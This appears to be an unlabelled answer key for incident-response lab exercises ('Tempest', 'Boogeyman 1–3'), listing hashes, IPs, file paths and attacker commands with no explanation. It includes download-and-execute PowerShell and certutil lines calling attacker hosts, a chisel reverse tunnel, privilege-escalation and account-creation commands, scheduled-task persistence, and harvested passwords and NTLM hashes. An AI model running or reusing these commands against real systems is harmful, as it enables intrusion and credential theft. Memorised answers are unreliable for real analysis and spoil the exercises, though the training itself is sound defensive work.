Tempest Incident CB3A1E6ACFB246F256FBFEFDB6F494941AA30A5A7C3F5258C3E63CFA27A23DC6 665DC3519C2C235188201B5A8594FEA205C3BCBC75193363B87D2837ACA3C91F D0279D5292BC5B25595115032820C978838678F4333B725998CFE9253E186D60 free_magicules.doc benimaru-TEMPEST 496 167.71.199.191 JGFwcD1bRW52aXJvbm1lbnRdOjpHZXRGb2xkZXJQYXRoKCdBcHBsaWNhdGlvbkRhdGEnKTtjZCAiJGFwcFxNaWNyb3NvZnRcV2luZG93c1xTdGFydCBNZW51XFByb2dyYW1zXFN0YXJ0dXAiOyBpd3IgaHR0cDovL3BoaXNodGVhbS54eXovMDJkY2YwNy91cGRhdGUuemlwIC1vdXRmaWxlIHVwZGF0ZS56aXA7IEV4cGFuZC1BcmNoaXZlIC5cdXBkYXRlLnppcCAtRGVzdGluYXRpb25QYXRoIC47IHJtIHVwZGF0ZS56aXA7Cg== 2022-30190 C:\Users\benimaru\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w hidden -noni certutil -urlcache -split -f 'http://phishteam.xyz/02dcf07/first.exe' C:\Users\Public\Downloads\first.exe; C:\Users\Public\Downloads\first.exe CE278CA242AA2023A4FE04067B0A32FBD3CA1599746C160949868FFC7FC3D7D8 resolvecyber.xyz:80\ http://phishteam.xyz/02dcf07/index.html base64 q /9ab62b5 GET nim infernotempest 5985 C:\Users\benimaru\Downloads\ch.exe client 167.71.199.191:8080 R:socks 8A99353662CCAE117D2BB22EFD8C43D7169060450BE413AF763E8AD7522D2451 chisel winrm spf.exe,8524FBC0D73E711E69D60C64F1F1B7BEF35C986705880643DD4D5E17779E586D printspoofer SeImpersonatePrivilege final.exe 8080 shion,shuna /add 4720 net localgroup administrators /add shion 4732 C:\Windows\system32\sc.exe \\TEMPEST create TempestUpdate2 binpath= C:\ProgramData\final.exe start= auto Boogeyman 1 agriffin@bpakcaging.xyz julianne.westcott@hotmail.com elasticemail Invoice_20230103.lnk Invoice2023! aQBlAHgAIAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AZgBpAGwAZQBzAC4AYgBwAGEAawBjAGEAZwBpAG4AZwAuAHgAeQB6AC8AdQBwAGQAYQB0AGUAJwApAA cdn.bpakcaging.xyz,files.bpakcaging.xyz seatbelt C:\\Users\\j.westcott\\AppData\\Local\\Packages\\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\\LocalState\\plum.SQLite Microsoft Sticky Notes protected_data.kdbx keepass hex nslookup python POST dns %p9^3!lL^Mz47E2GaT^y 4024007128269551 Boogeyman 2 westaylor23@outlook.com maxine.beck@quicklogisticsorg.onmicrosoft.com Resume_WesleyTaylor.doc 52c4384a0b9e248b95804352ebec6c5b https://files.boogeymanisback.lol/aa2a9c53cbb80416d3b47d85538d9971/update.png wscript.exe C:\ProgramData\update.js 4260 1124 https://files.boogeymanisback.lol/aa2a9c53cbb80416d3b47d85538d9971/update.exe 6216 C:\Windows\Tasks\updater.exe 128.199.95.189:8080 C:\Users\maxine.beck\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\WQHGZCFI\Resume_WesleyTaylor (002).doc schtasks /Create /F /SC DAILY /ST 09:00 /TN Updater /TR 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NonI -W hidden -c \"IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp HKCU:\Software\Microsoft\Windows\CurrentVersion debug).debug)))\"' Boogeyman 3 6392 "C:\Windows\System32\xcopy.exe" /s /i /e /h D:\review.dat C:\Users\EVAN~1.HUT\AppData\Local\Temp\review.dat "C:\Windows\System32\rundll32.exe" D:\review.dat,DllRegisterServer Review 165.232.170.151:80 fodhelper.exe https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.zip itadmin:F84769D250EB95EB2D7D8B4A1C5613F2 IT_Automation.ps1 QUICKLOGISTICS\allan.smith:Tr!ckyP@ssw0rd987 WKSTN-1327 wsmprovhost.exe administrator:00f80f2538dcb54e7adc715c0e7091ec backupda http://ff.sillytechninja.io/ransomboogey.exe